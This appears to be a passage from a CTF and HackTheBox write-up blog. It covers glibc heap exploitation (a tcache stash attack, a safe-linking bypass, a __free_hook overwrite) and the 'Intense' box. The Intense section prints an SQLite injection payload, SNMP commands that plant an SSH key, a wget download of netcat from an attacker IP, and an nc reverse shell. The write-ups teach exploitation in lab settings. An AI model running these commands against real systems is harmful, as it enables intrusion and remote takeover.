In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need to have 15 0x110 chunks to be freed. The first 7 can be freed into tcache, and the next 8 will be freed into unsorted (in which we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into smallbin, and have the chunk inserted into the 0x110 smallbin last be overlapped to have its bk pointer tampered with; this way we can still stash attack without crashing and have the final chunk entering tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, and we will need 5 more. Here is the program chunk array as of now:

The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9. 

To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.

Now, I added 5 more 0x110 chunks. This cannot just be done as directly as such. Rather, I performed the allocations (and some frees) in such a way such that the unsorted bin created from freeing chunk 0 runs out after 3 0x110 chunk allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6 chunk's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin). Since we know that for this last chunk will go into unsorted before smallbin, I had to ensure that it will not coalesce with the neighboring unsorted, so I freed a previous 0x110 chunk and allocated one more from unsorted to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about their return.

One thing to note is the reason for which I chose index 6 to be the one to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments, but it's because there was a 0x110 chunk after it and it was also the first of the three chunks I kept in memory.

At this stage, we have 15 chunks of 0x110 size: index 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep these number of chunks for the tcache and smallbin frees, I closely considered the following rules I know (which you can see from debugging):

1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)

2. 12 will back coalesce into the large unsorted if not entered into tcache.

3. 0, 3 is a chain

4. 8, 10 is a chain

5. 5 is on top of the big unsorted chunk

6. 2, 4 are isolated

7. 7 has the potential to go into unsorted and merge with a smallbin

8. 18 must be the last one into the smallbin

Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.

Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.

Since we don't have edit anymore, I had to free index 6 into unsorted, and then allocate for it to get it back and perform the overwrite over the index 18 0x110 small chunk to write a libc address into mp_.tcache_bins. Making another request into the smallbin should trigger the stash. 0x110 smallbin is also corrupted afterwards and you should avoid allocating from it.

Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.

Then, I pulled from a chunk from the large unsorted chunk we had to overlap into what was index 9, and following the pointer obfuscation rules, changed it to __free_hook.

Now, we must decide on how to escape the seccomp filter. Of course we will need to do an open read write rop chain, however how can we pivot with only control over __free_hook (which implies we have control over rdi)? 

One idea that we had was setcontext, which is a well known function to use as a stack pivot.

However, starting around libc-2.29 (?) it relied on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many (newer?) glibc versions) that allows us to control rdx from rdi and call an address relative to rdx. In this libc, it was the following:

mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

This makes it relatively trivial as we can just set up the heap for the ROP (take care of the one push rcx instruction setcontext undergoes). I went for a mprotect to change heap to rwx, and then pivoted it to shellcode on the heap to open read write exit. Due to my previous spamming of 0x21 metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:

Final Exploit:

Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, running it with the provided ynetd binary (as the CTF server is no longer up) with a 3 second timeout for each option added onto my script still had it over 10 minutes under the sigalarm limit, so it should have been fine during the actual competition scenario.

Concluding thoughts:

While this challenge was overall pretty decent as it showed some up to date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. This challenge could have been just as difficult conceptually if it allowed for 2-3 more allocation spots (rather than force players who have the correct plans to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made in this libc makes sense and did contribute to overall quality, I do see libc patching happening more often and hope CTF authors do not abuse it to create extremely contrived heap note problems.

Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!

Saturday, November 14, 2020

Intense HacktheBox Writeup

 

Intense was a hard box involving some web exploitation techniques such as sqlite injection and hash extension attack, snmp exploitation, as well as an easy pwnable for root. Overall, I thought sokafr did a great job with this box.

To begin, our initial port scan revealed the following ports from masscan:

22/tcp  open   ssh     syn-ack ttl 63

80/tcp  open   http    syn-ack ttl 63

161/tcp closed snmp    reset ttl 63

Opening up port 80, we see the following:


It provides us with guest:guest as credentials, as well as a link to the zipped source code, which we can download. Inside, you can find some templates and other misc. info, but the most important files are the 4 python files of this flask app (which uses a sqlite database): utils.py, lwt.py, app.py, and admin.py.

Some important takeaways from this include the following observations:

The user information from here is stored in the sqlite database, based on the data for username and secret (which is the sha256 hash of your input for password). The usage of query_db() and its behavior makes it safe from sqli at this login point.

The session is built and checked in the following manner at some of the following functions:

To summarize, the cookie is composed of an “auth” cookie, which is composed of 2 base64 portions separated by a period. The first portion is based on the return value of try_login(), which is a dictionary of username and secret. Using this dictionary, it formats the session as username=username;secret=hash;. Afterwards, the cookie gets a signature from the previous data by taking the digest of sha256(SECRET + data) where SECRET is a random bytestring of random length between 8 and 15; this is the second portion of the cookie. Then both the data and this signature are encoded and returned for the cookie value of “auth.” In many subsequent operations, get_session() is called, which calls parse_session(), which first verifies the contents of the data with the signature. Interestingly enough, if you find a way to bypass this verification, the way parse_session() behaves would allow you to append data to replace keys that get already set in the loop beforehand.

Becoming admin lets you interact with some interesting functionality:

There's a ridiculously obvious lfi here. Now, would there be any endpoints that would allow us to extract data to become admin?

Let's take a look at a feature the guest user has access to, the submitmessage() function:

You're restricted to a 140 byte message, and there are some blacklisted words. However, now query_db isn't even really used “correctly," as the application is just directly formatting your input in, leading to an obvious sqlite injection. One thing to note is that it doesn't really show you the result besides success or failure, so this is a clear case of a error based injection. I just used load_extension when the comparison in my error brute force is false; this would return an authorization error (plus the extension won't even exist). My teammate Bianca had another interesting way to error brute this, relying on passing bad inputs to json_extract when the comparison fails to trigger an error.

Messing around briefly in db-fiddle, I will be basing my script off the following sqli template:

injection: ' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--

query: insert into messages values ('' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--')

I wrote the following script to retrieve the admin username and hash with a simple linear brute, as the username probably will just be admin, and the hex charset is small enough:

I ended up recieving the following hash: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105

But it's not crackable with any wordlist or rule combination I have... this is where the way the application signs sessions and checks them comes in. Remember how it signed it with the secret in front before hashing? Under these conditions, sha256 is vulnerable to the hash extension attack. This post explains this attack much better, as I just ended up relying on the hash_extender tool. In our case, we know the hash function, the data, as well as the original signature, so we have all the conditions ready for this attack, in which we append data to it to generate a valid signature without knowing the secret (and appending the data can make us admin since the session parser doesn't check for duplicates). As for the attack, the general gist is that if you know the state of a hash, you can create a valid hash with appended data to the input to the function by setting the hashing algorithm state back to the signature's value, so the algorithm continues to hash from there (and this will produce a valid result!).

Since the secret is a variable length, I wrote the following script to bruteforce a valid session:

Now, with a valid session, we can go to the admin functions and perform lfi.

With some requests, I also noticed the user flag (and the source code for the pwnable) in the user directory with payload ../../../../../../../../../home/user.

Recalling our earlier enumeration, I remember the snmp port. Pulling out /etc/snmp/snmpd.conf, I see the following:

Seeing the rw communitstring made me immediately think of rce over snmp, which is very well documented here. To quote the article:

The SNMP community string is essentially a plaintext password that allows access to a device’s statistics and configuration.

Since there is a length limit to the payloads (255 chars for command) with nsExtend related operations, I ended up generating a shorter ssh key to give myself ssh access as the Debian-snmp user with the following commands:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1VxdqPOpZvaJtuvtTMZJlchmQCLw8cC0tvD79eSlaL0hsS0XRFRaAKFf55UP1SarbED+teHFQUPbLa6uJlBxJQrPLQfujmo6su7P2jGPDZrwxIgKA7Om8cUvLXuNdHrTVwze68z7QBCIi6m1ofHBvZJOdWMt6O0idpybWefz7Cw== root@kaliVM > /dev/shm/w"'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "cat /dev/shm/w > /var/lib/snmp/.ssh/authorized_keys"'

Remember to trigger it each time with: snmpwalk -v 2c -c SuP3RPrivCom90 10.10.10.195 nsExtendObjects

When you lfi the source code of the pwnable (note_server.c) earlier on, you can see that it opened its port on 5001, so we can port forward it out:

ssh -N -L 5001:127.0.0.1:5001 Debian-snmp@intense.htb -i key

However, we still need libc and the binary, and from the lfi on passwd, we know Debian-snmp shell is /bin/false. So I ended up popping a shell with the following commands so I can transfer files out (we had to use nohup to prevent snmp from hanging and then crashing, and some fiddling was required for the commands to work):

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' =  'wget http://10.10.14.9/nc -q -O /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = 'chmod +x /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = '/dev/shm/nc 10.10.14.9 1337 -e /bin/sh'

The following was the source:

This is just a variation of the previous forking stack overflow server pwns I've written extensively about in both my Rope and Patents writeup, so I'll skim through this pwn. It's another forking note app, with PIE, FULL RELRO, and canary (which is trivial to beat once you leak since it is forking).

Your options are ‘\x01’ for write, ‘\x02’ for copy, and ‘\x03’ for show. When you write data, you tell it the length, and it adds the length to an index to check if their sum is over the buffer size. If it's not, you can send in data with specified length size to the note char array starting at the current index, and it increments your index by the buffer size you requested. Do note that you can only send in a byte for the requested size.

For copy, you get 2 bytes to specify an offset, and the offset is checked to remain in the range of 0 and the current index. However, the size to be copied isn't checked, so there is a potential overflow once it copies from the note buffer at the specified offset to the note buffer at the current index. It also increases the index by the specified copy amount, so we can read out of bounds with this as well (as show doesn't check).

For show, there isn't nothing much to know except that it writes out data and returns, so the fork ends.

In my exploit, I basically first increased the index to 1024 and abused copy's lack of checks to extend the index so that the buffer printed with option 3 will leak canary, stack addresses, and pie base. Then I wrote a rop chain with proper padding and canary in front to leak libc addresses in the front of the buffer (and adjusted it to increase the index to 1024), then had it copy the length of the rop itself from offset 0 to the current index (1024), allowing for an overflow to leak libc once we trigger a return with show. Then apply the same principle to dup2 the file descriptors and pop open a shell. Here is my final script:


And that should get us root shell! Thanks once again to sokafr for the fun box, and pottm and bjornmorten for giving my writeup a read through before publishing.

Sunday, October 4, 2020

CUCTF 2020 Dr. Xorisaurus Heap Writeup (glibc 2.32 UAF)

Here is my writeup for my 2.32 glibc heap challenge (Dr. Xorisaurus) from CUCTF 2020; make sure to check out the writeup for my kernel challenge Hotrod as well!

One important concept to note about glibc 2.32 is the new mechanism of safe linking on the singly linked lists. This new protection scheme is discussed in depth here. Basically, for singly linked freelists (fastbins and tcache bins), free chunk fds are obfsucated by the following scheme: (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer). With a heap leak, this protection can be easily bypassed as heap behavior in glibc is predictable, which is what this challenge will revolve around. Bruteforcing or  leaking a copy of the stored pointer and applying some basic crypto knowledge can help you recover the original data as well in some cases (especially when the chunks in the list are close together).

In this challenge, we were given a libc with debug symbols, linker, and patchelf'd binary with the following protections:

Now, when reversing this binary, one should find 4 features. 

You can fill a glass, examine a glass, drain a glass, and switch the contents of the glass according to the menu. There is also an initial sigalarm in the beginning, and you can only have a maximum of 25 glasses. Filling a glass is equivalent to an allocation; it finds an index in the global glasses array for you, requests for a size that is in the range of 0x60 and larger fastbin sizes, and reads in some data. Examining a glass can be useful for leakage, as it just puts() the content of the chunk out; note that examinations can only be used twice (which can be assumed to be for a libc leak and a heap leak). Draining is the equivalent of a free and it is safe as it nulls out the pointer in the global array. You can use this feature as many times as you can, but once you swap contents (feature 4), you can only free one more time. As for the swap function, you can use it to free a chunk, and then immediately reallocate based on 2 choices for sizes. After the allocation, the binary reads in 8 bytes. This where the 8 byte UAF comes in as the conditional is poorly written, so if you select an invalid choice, there will be no re-allocation and you will be reading into the freed chunk's metadata (take a look at the decompilation below). Now let's plan out our exploit:

One might make the mistake of thinking of using swap to create a double free, but the 8 byte UAF won't allow you to change tcache keys so freeing that chunk again will fail a malloc() check. Some might think about filling tcache and then applying a fastbin dup attack, but the fact that you can only free one more time after swapping prevents the bypass against the fastbin double free check. 

To obtain a leak, one might be tempted to just free a chunk and then reallocate it to see the obfuscated pointer (and then shift left by 12 bits to recover heap base). However, the read call during the allocation requires at least one byte (unless pty is enabled server side), so 5 nibbles of the heap address will be missing. This means there would be 1 byte of entropy on the leak, but a proof of work is required for 3 bytes of a random sha256 hash on remote, so bruteforcing isn't as feasible.

A better way to obtain a leak is to abuse the behavior of scanf. When scanf reads in large payloads of characters that follow it's format specifier, scanf will begin to allocate from the heap. For example, if we send in 0x500 '1's, scanf will make a largebin allocation request from the heap. As one familiar with the heap might know, triggering largebin sized allocations will lead to malloc_consolidate() (source), which will go through the freed fastbins and consolidate them to unsorted (source). This malloc_consolidate() is the basis for another type of attack known as fastbin consolidation, which is discussed here in better depth. After malloc_consolidate(), the request for the large allocation will then cause the chunk in unsorted to be sorted into largebin. On the next request, one can use it to request a heap leak. The chunk will then be sorted into unsorted, from which we can easily grab a heap leak (feel free to debug this out when I attach my exploit later on if this seems confusing). This method of leaking really only came up after my teammate c3bacd17 found an unintentional bypass in one of my other challenges.

Once we have the leak, some basic math will allow you to abuse the 8 byte UAF to maliciously corrupt the obfuscated pointer. Note that 2.32 malloc()'s safe linking mechanism also ensures that the deobfuscated pointer is aligned. Because of this and the fastbin size check, we can no longer do the unaligned trick here for fastbin dup. We will have to rely on tcache poisoning here, and an evil obfsucated pointer can be created by xoring the address location of the fd right shifted by 12 bits with the target location.

I ended up targeting __free_hook and changed it to system, then "freed" a chunk with the string "/bin/sh" on it to pop a shell. As for the proof of work on remote, it can easily be handled by the proofofwork python library that automatically generates a proof.

The following is my final exploit with comments:



Hope everyone enjoyed this challenge and writeup! Feel free to let me know if anything needs to be clarified or if anything explained is incorrect. Congrats to lms of Dakota State for blooding this challenge as well!

For those interested in trying this challenge out, it is archived in the CUCTF repos.